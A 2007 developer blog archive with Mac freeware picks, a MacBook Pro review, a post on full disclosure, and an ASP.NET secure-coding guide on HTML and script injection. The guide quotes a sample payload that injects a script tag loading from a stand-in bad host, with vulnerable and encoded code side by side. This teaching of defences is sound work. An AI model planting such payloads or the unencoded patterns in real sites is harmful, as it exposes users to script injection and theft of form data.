Archive for December, 2007

Mac freebies for Christmas

MouseWarp

Spaces is new in Leopard bringing virtual desktops to the masses. Leopard gives you a number of ways to switch between spaces including a menu-item drop down and configurable keyboard shortcuts.

To move a window to another space you drag it to the edge of the screen and wait a moment but curiously you can’t use this great technique without a window to switch!

MouseWarp adds that missing feature and provides configurable delay, an optional keyboard modifier to activate it and the choice of whether the mouse stays where it was or flips to the opposing edge on the new space.

BitRocket

I’ve tried and recommended a number of BitTorrent programs in previous Mac software posts but BitRocket sports a great modern Mac look. The user interface tends to get a bit confused when switching around a bit but being open source this could be fixed quite promptly.

Update: I can’t recommend this program whilst it crashes so often, check out the alternatives Jane suggests in the comments.

LiteIcon

Tools to replace the Mac’s choice of system icons are surely only going to get more popular with Leopard’s annoying almost-identical watermarked folders. Whilst LiteIcon isn’t quite as slick as the commercial app CandyBar it is $29 cheaper and still lets you use the multitude of pre-made iContainer packs from the likes of IconFactory.

Think

Are you one of those people that get distracted by other apps on the screen? Me too, which is why I now use Spaces, but Think is an alternative that darkens the other running applications to your taste.

Carbon Copy Cloner

If you are a Boot Camp user like myself you might want to be able to backup that Windows partition to disk somewhere and Carbon Copy Cloner comes to the rescue. This is fine for the occasional backup but I’m finding myself wanting something like Time Machine for Windows – suggestions anyone?

MacHeist

MacHeist is an odd concept to explain but starts with a couple of free apps and alternate reality game. If you can solve the missions then your name is probably Jonathan Creek but the rest of us can take tips, or combinations wholesale, from the official forums where those with more brains, resources or time have collaborated on solving it.

As you enter more combinations you unlock additional free (but non-upgradable) applications and the odd discount for a forthcoming bundle in January which you are under no obligation to buy. You can also get an extra free app for Christmas by referring a friend. Just remember to backup the downloadable installers and serial numbers as once they’re gone that’s it!

So far the apps are (and I’ll update this tomorrow when I can unwrap the other three):

WireTap Pro

WireTap Pro lets you record any sound your Mac can make – thereby effectively allowing you to rip anything you can play if you don’t mind the degradation in quality of lossy re-compression. It also lets you record snippets from DVDs you are watching or games you are playing for perhaps review purposes.

BitClamp

Encryption has lots of uses, not all nefarious, and BitClamp offers simple drag-and-drop encryption of your files into 256-bit AES or Serpent encryption or super-secure 448-bit Blowfish. It also offers gzip compression and the ability to bundle a Mac-only decryption program into the file.

Mouseposé

Screencasts are getting slicker by the download and now include web-cam-in-picture and a variety of keyboard and mouse triggered effects so you can see what they are doing. Mouseposé won’t help you with the webcam bit but it can darken the rest of the screen and highlight the mouse, visually show clicks on the screen and display your keystrokes.

Runic

A free game that I haven’t yet played, sorry. The only gaming I’ve been doing of late is Guitar Hero II/III although I’m hoping to get a couple of DS games tomorrow as well as a nice backpack to store my shiny new laptop in :)

Wallet

An address-book style application for storing items such as credit card numbers and serial numbers/registration details secured with 448-bit Blowfish encryption.

Catalog

Lets you store an index of all your media on your computer for ease of scanning. These sorts of programs made sense in the days of floppy disks and small hard drives but seem pointless to me now…

Enigmo

Weird puzzle game that bears a little resemblance to the pipe-mania style games (that also made an appearance in BioShock under the guise of ‘hacking’).

Podcast Maker

Assembles XML files to describe podcasts with support for adding images and links. Useful because it’s free but I can’t see how anyone would have previously paid $29.95 for an interface for editing specific XML files.

Freeze Frame

Allows you to pause applications when you need the CPU back. Err, okay…

Voice Candy

Here’s a cool fun little app reminiscent of 80’s TV show Whizz Kids and later messing around on my Amiga. It basically lets you talk into your computer whereby it will adjust the waveforms so you sound different. Like a chipmunk, Darth Vader, a robot, on the telephone, on an old radio, like a bad sci-fi movie, a sore throat or a mouse. You can also record the audio for later mixing up in GarageBand. Good fun and if the next version includes configurable effects I might have to actually buy a copy.

DEVONnote

Note taking and organising application.

Hana

What appears to be a minimalist browser on top of the WebKit/Safari engine.

Billy Frontier

Space cowboy shoot-em-up game.

Monkey Lover

What appears to be monkeys fighting for their life on an American Football pitch. Not really my thing.

Sofa Control

Extends the use of your Apple Remote to applications besides iTunes and FrontRow :)

Xslimmer

Another tool to prune applications of the languages and architecture segments you do not require albeit with a much better interface than Monolingual.

Hope you have a great Christmas (or a great Tuesday if you don’t celebrate that ;-)

[)amien

Thoughts on awareness of security vulnerabilities & full disclosure

HTML, SQL and XSS injection vulnerabilities aren’t new but they are still largely ignored by developers.

My first encounter with these issues was in 1999 whilst writing an extranet e-commerce web site. Back then the ASP fix consisted of Server.HtmlEncode for all output and a Replace("'", "''") for strings heading to SQL (other types headed there via CInt/CLong/CDate and I wasn’t aware of parametrised queries).

Convincing co-workers of the severity of the issue and what to do about it for several years can be a draining process when you work with such a variety of developer personalities and projects and you would rather be spending the time on more exciting things.

Over the last few months I’ve been trying hard to push the message further afield via presentations at the local user group, articles here on my blog, discussions in Redmond as well as forums and private mailing lists.

More than once I’ve had the feeling I should give it a rest in case people think I have nothing else to talk about and at a few times I’ve considered publishing a few scripts I had in my head to really show the sort of things available. Of course doing such a thing would both highlight the problem but also provide a dangerous tool to people who might use it to actually exploit sites which is a problem with full disclosure. In the end my article How dangerous is HTML injection was a much neutered version without a killer payload.

Thankfully some great people are now on the case, including Rob Conery and Phil Haack, who I believe in to push this from the inside, and Steve Sanderson, who came up with an elegant prototype on how to handle this at the source.

That will be all the HTML injection posts for a while I hope for there are many other things I want to work on and write about.

[)amien

One week with a MacBook Pro 17″

It has been one week since I picked up my new MacBook Pro 17″ to replace my aging first-generation 15″ model.

My initial concern was that the size and weight would be unwieldy after 4 years of lugging around a 15″ MacBook Pro and, prior to that, a Titanium PowerBook G4. The actual problem was that my trusty Samsonite Trunk & Co. backpack could not accommodate it and that I’d have to hope Santa would deliver something a little bigger. Being properly kitted up might reveal if the dimensions and weight are uncomfortable so expect an update once I’ve travelled with the beast.

The screen is fantastic, a little brighter, and provides me with a desktop-like experience in terms of real estate thanks to the combination of the increased size and the high-definition 1920×1200 option. I had examined the glossy finish in-store and found having my face and the rest of the store glaring back at me far too distracting for real work (it might be nice for watching DVDs in the dark I guess) and so went with the matte finish. Surprisingly it is a little more reflective than the older MBP but not overly so and it does make removing unwelcome fingerprints easier.

One problem I had with my 15″ was that heavy use of Visual Studio within Parallels wasn’t always cutting it on performance. Compilation was faster than the cheap HP/Compaq desktop I’d been using but still wasn’t snappy enough to keep my attention tightly focused ;-)

I went with the top options – a 2.6GHz processor coupled with 4GB of RAM and a 7200RPM 200GB drive – to ensure maximum performance. Mac OS X and native Vista did not disappoint and felt like a speedy desktop despite Vista being 32-bit and limited to 3GB of RAM until Apple ship 64-bit ready Boot Camp drivers and tools.

My .NET development typically takes place inside a virtual machine – previously Parallels but now evaluating VMware Fusion with its enticing dual-core and 64-bit guest OS support. Both Parallels and Fusion had similar almost-native performance in the disk and processor department on my 15″ according to Vista’s performance index and I’ve yet to rerun those (stay tuned). Whichever gets Aero/DirectX 9Ex shader support first will be my home for a while.

Battery life was a big surprise offering over 3 hours and I certainly feel less conscious of where the next power feed is coming from although that is partly due to the poor battery on my old machine being rather tired and worn.

One big disappointment is the keyboard. Firstly it is the same size as the 15″ model which leaves the extra space to the speaker grille. Whilst the speakers do sound far superior – good enough to actually listen to music on – I couldn’t help but feel a wider enter key, a second ctrl and a little f-key spacing could have gone a long way. What is more concerning is that many keys do not register if hit off-centre even by a slight amount :(

There are still some things to try:

  • Games under native Vista taking advantage of the Nvidia 8600M GT chip
  • Time Machining my MyBook Pro external drive over FireWire 800 (800 Mb/s) instead of USB2 (400 Mb/s)
  • Burning DVD performance
  • Removing DVD drive (UJ-85J FBZ8) region protection (RPC) to play my DVD collection

[)amien

5 signs your ASP.NET application may be vulnerable to HTML injection

If you don’t encode data when using any of the following methods to output to HTML your application could be compromised by unexpected HTML turning up in the page and modifying everything from formatting through to capturing and interfering with form data via remote scripts (XSS). Such vulnerabilities are incredibly dangerous.

Using MonoRail or Microsoft’s MVC does not make you automatically immune – use {! } in MonoRail’s Brail engine and the HtmlHelpers in Microsoft’s MVC to ensure correct encoding.

Just imagine post.Author contains "><script src="http://abadsite.com"></script> after an unscrupulous user entered that into a field your application uses and it got into the database. The following typical ASP.NET techniques would leave you open.

1. You use <%= %> or <%# %> tags to output data

Example showing outputting literals with <%= %> :

// Vulnerable
<p>Posted by <%= post.Author %></p>
// Secure
<p>Posted by <%= HttpUtility.HtmlEncode(post.Author) %></p>

2. You use Response.Write

Example showing writing out attributes with Response.Write and String.Format, again post.Author could contain <script>:

// Vulnerable
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", post.Author));
// Secure
Response.Write(String.Format("<input type=\"text\" value=\"{0}\" />", HttpUtility.HtmlAttributeEncode(post.Author)));

3. You set HRef or Src on HtmlAnchor, HtmlImage or HtmlInputImage controls

In general the controls in the HtmlControls namespace are very well behaved with encoding but there is a bug in the code that attempts to adjust the relative URLs for href and src attributes which causes those properties to bypass encoding (I’ve reported this to Microsoft).

Example showing anchor HRef attribute abuse:

// Vulnerable (HtmlAnchor exposes InnerText rather than Text)
outputDiv.Controls.Add(new HtmlAnchor() { InnerText = "Test", HRef = post.Author });
// Secure
outputDiv.Controls.Add(new HtmlAnchor() { InnerText = "Test", HRef = HttpUtility.HtmlAttributeEncode(post.Author) });

4. You set the Text property of WebControls/WebForms

You would imagine the high-level WebForms controls would take care of encoding and you’d be wrong.

Example showing the Label control being so easily taken advantage of:

// Vulnerable
outputDiv.Controls.Add(new Label() { Text = post.Author } );
// Secure
outputDiv.Controls.Add(new Label() { Text = HttpUtility.HtmlEncode(post.Author) } );

The one exception to this is the Text property of input controls – as they put the value into an attribute and therefore call HttpUtility.HtmlAttributeEncode for you.

5. You use the LiteralControl

LiteralControl is a useful control for adding text to the output stream that doesn’t require its own tag. It also helpfully, and uncharacteristically, provides a useful constructor. Unfortunately it fails to encode the output.

Example showing poor LiteralControl wide open:

// Vulnerable
outputDiv.Controls.Add(new LiteralControl(post.Author));
// Secure
outputDiv.Controls.Add(new LiteralControl(HttpUtility.HtmlEncode(post.Author)));

Do not:
  1. Encode data in the database – your contaminated data will be difficult to use elsewhere and will end up double-encoded
  2. Look for script on submit – you won’t catch every combination and it might prevent valid data
  3. Trap entry with client-side code – it is trivially bypassed

Just encode the output :)
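The five output paths above and the three "do not" items all come down to the same rule, so here is one added worked example (mine, not code from the original post) that exercises it outside WebForms: a console program that renders the constructed payload from the post into element text and into a quoted attribute, both raw and encoded, and then shows what double encoding does to data that was wrongly encoded before it reached the database. It uses the real System.Web.HttpUtility class; the Post class, the Render* methods, the ContainsInjectedMarkup check and the sample strings are assumptions made for this example. It assumes a console project that references System.Web.dll on the .NET Framework, or .NET Core 2.0+ / .NET 5+ where System.Web.HttpUtility ships with the runtime.

```csharp
using System;
using System.Web; // HttpUtility: System.Web.dll on .NET Framework, built into .NET Core 2.0+ and .NET 5+

// Added example, not from the original post. Post, the Render* methods and the
// payload string are constructed for illustration only.
public class Post
{
    public string Author { get; set; }
}

public static class SafeRendering
{
    // Constructed payload of the kind the post describes: it closes an open
    // attribute value and then injects a remote script tag.
    public const string Payload = "\"><script src=\"http://abadsite.com\"></script>";

    // Equivalent of <%= post.Author %>, Label.Text and LiteralControl:
    // the value lands between tags, so it needs HtmlEncode.
    public static string RenderParagraphVulnerable(Post post)
    {
        return "<p>Posted by " + post.Author + "</p>";
    }

    public static string RenderParagraphSecure(Post post)
    {
        return "<p>Posted by " + HttpUtility.HtmlEncode(post.Author) + "</p>";
    }

    // Equivalent of the Response.Write + String.Format case: the value lands
    // inside a quoted attribute, so it needs HtmlAttributeEncode, which turns
    // the double quote into &quot; and so cannot close the attribute early.
    public static string RenderInputVulnerable(Post post)
    {
        return String.Format("<input type=\"text\" value=\"{0}\" />", post.Author);
    }

    public static string RenderInputSecure(Post post)
    {
        return String.Format("<input type=\"text\" value=\"{0}\" />",
            HttpUtility.HtmlAttributeEncode(post.Author));
    }

    // Crude check used only by this demo: does a script start tag or an
    // attribute breakout ("><) survive in the rendered markup?
    public static bool ContainsInjectedMarkup(string html)
    {
        return html.Contains("<script") || html.Contains("\"><");
    }

    // Illustrates "do not encode data in the database": a value encoded before
    // storage gets the normal output encoding applied on top, so &lt; becomes
    // &amp;lt; and the reader sees a literal "&lt;" on the page.
    public static string DoubleEncoded(string raw)
    {
        string storedEncoded = HttpUtility.HtmlEncode(raw); // mistake: encoded on the way in
        return HttpUtility.HtmlEncode(storedEncoded);       // correct output encoding on the way out
    }

    public static void Main()
    {
        var post = new Post { Author = Payload };

        Console.WriteLine("-- raw (vulnerable) --");
        string p = RenderParagraphVulnerable(post);
        string i = RenderInputVulnerable(post);
        Console.WriteLine(p);
        Console.WriteLine(i);
        Console.WriteLine("injected markup present: " + ContainsInjectedMarkup(p) + " / " + ContainsInjectedMarkup(i));

        Console.WriteLine("-- encoded at output (secure) --");
        p = RenderParagraphSecure(post);
        i = RenderInputSecure(post);
        Console.WriteLine(p);
        Console.WriteLine(i);
        Console.WriteLine("injected markup present: " + ContainsInjectedMarkup(p) + " / " + ContainsInjectedMarkup(i));

        Console.WriteLine("-- double encoding --");
        Console.WriteLine(DoubleEncoded("Tom & Jerry <3"));
    }
}
```

The encoder is chosen by where the value lands, not by where it came from: HtmlEncode for element content, HtmlAttributeEncode for a quoted attribute. Note that HtmlAttributeEncode leaves > alone, which is harmless inside a quoted attribute but is why it is not a drop-in substitute for HtmlEncode in element content, and that the only encoding step is the one at output; the stored value stays as the user typed it.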

(The samples use .NET 3.5 object initializer syntax for brevity as many affected controls do not have useful constructors)

[)amien